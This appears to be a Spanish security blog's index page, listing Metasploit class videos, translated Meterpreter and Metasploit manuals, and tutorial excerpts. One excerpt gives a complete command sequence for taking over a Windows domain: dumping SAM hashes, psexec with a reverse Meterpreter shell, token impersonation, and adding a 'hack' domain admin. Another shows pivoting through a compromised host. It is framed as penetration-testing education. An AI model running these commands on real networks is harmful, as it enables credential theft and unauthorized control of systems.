Video Tutoriales de Metasploit Framework

El 8 de mayo de 2010, la AISS Kentuckiana realizó una capacitación de siete horas en el Brown Hotel de Louisville Kentucky Las ganancias recaudadas en la capacitación fue para el programa de Alimentos por Trabajo de “Hackers For Charity”. Los instructores fueron David “ReL1K” Kennedy, Martin “PureHate” Bos, Elliott “Nullthreat” Cutright, Pwrcycle y Adrian “Irongeek” Crenshaw. A continuación se muestran los vídeos del evento. Espero que los disfruten. Metasploit Intro – Irongeek (Descargar Vídeo – Descargar Diapositivas – Ver Online) Metasploit Scanning and Pivoting – Pwrcycle (Descargar Vídeo – Descargar Diapositivas – Ver Online) Metasploit Fuzzing and Exploit Development – Nullthreat (Descargar Vídeo – Descargar Diapositivas – Descargar Archivos – Ver Online) Meterpreter and Post Exploitation (and a demo of Metasploit Express) – Purehate (Descargar Vídeo – Descargar Diapositivas – Ver Online) Social Engineering Toolkit – ReL1K (Descargar Vídeo – Ver otro Video Tutorial de SET – Ver Online) More Encoding Fun, Fasttrack and Closing – ReL1K (Descargar Vídeo – Ver Online) Nota: Si deseas descargar todos los vídeos, seguramente te servirá este enlace, donde encontraras los vídeos en diferentes formatos, para que bajes el que mejor se acomode a tus necesidades. Mas Información: Metasploit Class Videos Clases de Metasploit en video [sam_ad...

Leer Más

Manual en español de Meterpreter

Ya les habia comentado la iniciativa existente para traducir el manual del Metasploit Framework al español, pero en metasploit-es.com.ar ademas de traducir este excelente framework, se pusieron en la tarea de traducir el Manual de Meterpreter publicado por skape en NoLogin.org .No se ha modificado el contenido del manual, la traducción sigue manteniendo el contenido del mismo. Este manual es propiedad de skape, simplemente se limitaron a realizar la traducción al Español. ¿Que es Meterpreter? Meterpreter e es una familia de plugins avanzados de los mismos creadores del Metasploit Framework, que se utiliza sobre sistemas Windows comprometidos y tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional ni dejar rastros, permitiendo incluso la inyección dinámica de dll’s o la migración entre procesos del interprete. Los dejo entonces en compañia del manual traducido al español de Meterpreter Manual en español de Meterpreter 1 Prólogo 2 Introducción 3 Referencia Técnica 3.1 Especificaciones de Protocolo 3.1.1 Estructura TLV 3.1.2 Estructura de Paquete 3.1.3 Definido TLV 3.1.4 Flujo de paquetes 3.2 Server Extensions 3.3 Client Extensions 4 Using Meterpreter 5 Conclusion 6 Command Reference 6.1 Built-in Commands 6.1.1 use 6.1.2 loadlib 6.1.3 read 6.1.4 write 6.1.5 close 6.1.6 interact 6.1.7 initcrypt 6.2 Extension: Fs 6.2.1 cd 6.2.2 getcwd 6.2.3 ls 6.2.4 upload 6.2.5 download 6.3 Extension: Net 6.3.1 ipconfig 6.3.2 route 6.3.3 portfwd 6.4 Extension: Process 6.4.1 execute 6.4.2 kill 6.4.3 ps 6.5 Extension: Sys 6.5.1 getuid 6.5.2 sysinfo 6.5.3 rev2self 7 Common API 7.1 Channel Management 7.1.1 channel find by id 7.1.2 channel get id 7.1.3 channel get type 7.1.4 channel is interactive 7.1.5 channel open 7.1.6 channel read 7.1.7 channel write 7.1.8 channel close 7.1.9 channel interact 7.2 Command Registration 7.2.1 command register 7.2.2 command deregister 7.3 Packet Management 7.3.1 packet create 7.3.2 packet create response 7.3.3 packet destroy 7.3.4 packet duplicate 7.3.5 packet get type 7.3.6 packet get tlv meta type 7.3.7 packet add tlv string 7.3.8 packet add tlv uint 7.3.9 packet add tlv bool 7.3.10 packet add tlv group 7.3.11 packet add tlv raw 7.3.12 packet add tlvs 7.3.13 packet is tlv null terminated 7.3.14 packet get tlv 7.3.15 packet get tlv string 7.3.16 packet get tlv group entry 7.3.17 packet enum tlv 7.3.18 packet get tlv value string 7.3.19 packet get tlv value uint 7.3.20 packet get tlv value bool 7.3.21 packet add exception 7.3.22 packet get result 7.3.23 packet transmit 7.3.24 packet transmit empty response 7.4 Encryption 7.4.1 remote set cipher 7.4.2 remote get cipher 7.5 Scheduling 7.5.1 scheduler insert waitable 7.5.2 scheduler remove waitable 7.5.3 scheduler run Ver en linea el Manual en español de...

Leer Más

Manual de Metasploit Framework en Español

Gracias a un comentario de hackmaf en el articulo Curso Completo de Metasploit Framework me entero de una iniciativa bastante interesante iniciada por Jhyx en su blog y organizada en metasploit-es.com.ar, con la que un grupo de personas, interesados por la seguridad informática, pretende traducir los manuales del Metasploit Framework al español. La traducción al español del manual de Metasploit Framework, esta publicado en formato WIKI (a diferencia que la original en ingles) y por lo cual podemos colaborar conjuntamente para tener pronto toda la guía “Metasploit Unleashed – Mastering the Framework” en nuestro idioma. Este es el índice del manual de Metasploit Framwork que en su mayoría ya se encuentra traducido al español, gracias a la iniciativa de metasploit-es.com.ar. Manual de Metasploit Framework en Español 28/10/2009 – METASPLOIT UNLEASHED – MASTERING THE FRAMEWORK 28/10/2009 – 1 Introducción  29/10/2009 – 2 Materiales requeridos para el curso 29/10/2009 – 2.1 Requisitos de Hardware 29/10/2009 – 2.2 Ubuntu 7.04 30/10/2009 – 2.3 Windows XP SP2 01/11/2009 – 2.3.1 Archivos Requeridos 01/11/2009 – 2.3.2 Configurando VMware 01/11/2009 – 2.3.3 Post-Instalacion XP SP2 01/11/2009 – 2.3.4 Servicios Adicionales 02/11/2009 – 2.3.5 Crear una Aplicación Web Vulnerable 02/11/2009 – 3 Interactuando con MSF 04/11/2009 – 3.1 msfconsole 05/11/2009 – 3.2 msfcli 07/11/2009 – 4 Obteniendo Información 07/11/2009 – 4.1 El Framework Dradis 07/11/2009 – 4.2 Escaneo de Puertos 07/11/2009 – 4.3 Plugins Auxiliares 07/11/2009 – 4.4 Buscando MSSQL 07/11/2009 – 4.5 Identificación de Servicios 26/11/2009 – 4.6 Password Sniffing  26/11/2009 – 4.6.1 Ampliando Psnuffle 19/12/2009 – 4.7 SNMP Sweeping 08/01/2010 – 5 Analisis de Vulnerabilidades 08/01/2010 – 5.1 Verificacion de Login SMB 08/01/2010 – 5.2 Autentificacion VNC 08/01/2010 – 5.3 X11 a la escucha 08/01/2010 – 5.4 Escaner Web WMAP 08/01/2010 – 5.5 Trabajando con Nessus 11/02/2010 – 6 Escribiendo un Simple Fuzzer 11/02/2010 – 6.1 Un simple Fuzzer de TFTP 11/02/2010 – 6.2 Un simple Fuzzer de IMAP 11/02/2010 – 7 Desarrollo de un Exploit 15/02/2010 – 7.1 Escribiendo un Exploit 15/02/2010 – 7.1.1 Obteniendo un shell 15/02/2010 – 7.2 Usando Egghunter Mixin 20/02/2010 – 7.2.1 Completando el Exploit 11/02/2010 – 7.3 Codigo Shell Alfanumerico 11/02/2010 – 8 Client-Side Exploits 04/03/2010 – 8.1 Binarios de un Payload 07/03/2010 – 8.2 Antivirus Bypass 04/03/2010 – 8.3 Binario de Trojanos en Linux 16/03/2010 – 8.4 Infeccion con el Applet de Java 16/03/2010 – 8.5 Ataques Client Side 19/03/2010 – 8.6 Kit de Herramientas de Ingenieria Social 19/03/2010 – 8.7 Metodos de Infeccion con VBScript xx/03/2010 – 14 Construyendo un Modulo xx/03/2010 – 14.1 Payloads a traves MSSQL xx/03/2010 – 14.2 Creando un Modulo Auxiliar xx/03/2010 – 14.3 El Funcionamiento Detras de Esto. 16/03/2010 – 15...

Leer Más

¿Cómo tomar control de un Dominio en Windows?

Los “dominios” en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupación lógica de servidores de red y otros ordenadores, para compartir  información común sobre cuentas  y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario administrador de un equipo en los dominios de windows. En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente: REQUISITOS Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario) Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social) Una copia de BackTrack 4 Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows: Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos: mount /dev/sda1 /mnt/sda1 Montamos la particion de la maquina windows cd /mnt/sda1/WINDOWS/system32/config accedemos a la carpeta dodne se encuentra el archivo SAM samdump2 system SAM sacamos los hash de los usuarios en la maquina windows msfconsole ejecutamos el metasploit por consola use windows/smb/psexec utilizamos el psexec exploit -p windows/meterpreter/reverse_tcp -o utilizamos la shell meterpreter LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j configuramos las opciones del exploit sessions -i 1 una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra use incognito utilizamos el modulo incognito de meterpreter list_tokens -u mostramos los tokens impersonate_token mydomain\\domainadmin tomamos las credenciales del administrador de dominio execute -f cmd.exe -i -t lanzamos la consola de windows net user hack MPass5678 /add /domain Agregamos el usuario “hack” con clave “MPass46782” al dominio net group “Domain Admins” hack /add /domain metemos el usuario hack al grupo de administradores de dominio Ya hemos tomado el control del dominio de windows Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean. PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de...

Leer Más

Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida

Algunas veces, al realizar un ataque es necesario vulnerar varias maquinas hasta llegar a nuestro objetivo final,  uno de los interrogantes mas  comunes en estas situaciones es ¿Como puedo atacar una maquina desde otra la cual ya tenga acceso? Veamos un ejemplo: Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún servidor que se encuentre en la DMZ (zona desmiritalizada) y desde allí atacar otras maquinas que se encuentren detrás del cortafuegos. Para hacer esto posible el  amado  y conocido Metasploit nos puede ser muy útil. El primer paso obviamente  es encontrar una vulnerabilidad en el servidor que se encuentra en la DMZ, explotarla usando como payload meterpreter. En la consola del metasploit digitamos: use [exploit que ataca la vulnerabilidad encontrada] set PAYLOAD windows/meterpreter/bind_tcp set RHOST [ip_host_dmz] exploit-que-ataca-la-vulnerabilidad-encontrada Ahora necesitamos saber el ID de la sesión, para esto digitamos lo siguiente en la consola de meterpreter: sessions -l El siguiente paso es crear una ruta hacia la maquina objetivo, indicando su ip, la mascara y el ID session que obtuvimos en el paso anterior: msf> route add [ip_maquina_objetivo] [Mascara  de red] [ID-Session] Por ultimo, lanzamos el ataque a la maquina objetivo, de forma normal como se haría en cualquier caso, es decir buscando la vulnerabilidad y aplicando el exploit respectivo, lo diferente es que debemos decirle al metasploit que debe pasar por el pc que ya se tiene acceso: msf> use [exploit_necesario] msf> set PAYLOAD windows/meterpreter/bind_tcp msf> set RHOST [maquina_objetivo] msf> exploit De esta forma podremos bypassear usando el metasploit, algo muy útil para todos los interesados en el área de la seguridad informática [sam_ad...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES

Aprende ONLINE Técnicas HACKING y Seguridad Informática guiad@ por Profesionales RECONOCIDOS con más de 10 años de experiencia REAL en el campo de la Seguridad Informática

Toma acción !AHORA¡
miles ya lo han hecho

NUNCA te enviaremos spam.

  • No necesitas conocimiento previo (De 0 a Ninja)
  • Docentes reconocidos en el medio y con experiencia REAL
  • Clases ONLINE en VIVO que luego podrás repasar si lo deseas desde cualquier parte o cualquier dispositivo
  • Contenidos EXCLUSIVOS generados por nuestros docentes
  • Contacto constante con el docente por distintos medios, antes, durante y después de las clases
  • Laboratorios en linea para que nuestros alumnos practiquen sus conocimientos sin problemas
  • Exclusivo FORO VIP de Alumnos y Ex-Alumnos donde se continúa el aprendizaje y se comparte conocimiento
  • Te entregamos un diploma de certificación por cada curso
  • Miles de ex-alumnos felices